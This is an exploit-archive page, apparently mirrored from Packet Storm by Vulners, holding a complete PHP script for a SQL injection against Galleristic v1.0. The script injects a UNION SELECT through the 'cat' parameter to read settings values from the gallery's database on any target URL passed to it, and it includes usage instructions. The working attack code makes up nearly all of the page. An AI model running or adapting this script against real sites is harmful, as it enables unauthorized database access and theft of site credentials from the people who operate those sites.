Lucene search
galleristic-sql.txt
๐๏ธย 08 May 2008ย 00:00:00Reported byย cOndemnedTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 14ย Views
Galleristic v1.0 Remote SQL Injection Exploi
Show more
`<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
function exploit($target, $v) {
$injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
$request = file($target . $injection);
for($i = 0; $i < count($request); $i++) {
preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);
if(!empty($response[1])) {
return $response[1] . '<br />';
}
}
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if(empty($_GET['target'])) {
die('No target site specified!');
}
else {
for($c = 1; $c < 3; $c++) {
echo exploit($_GET['target'], $c);
}
}
?>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo08 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4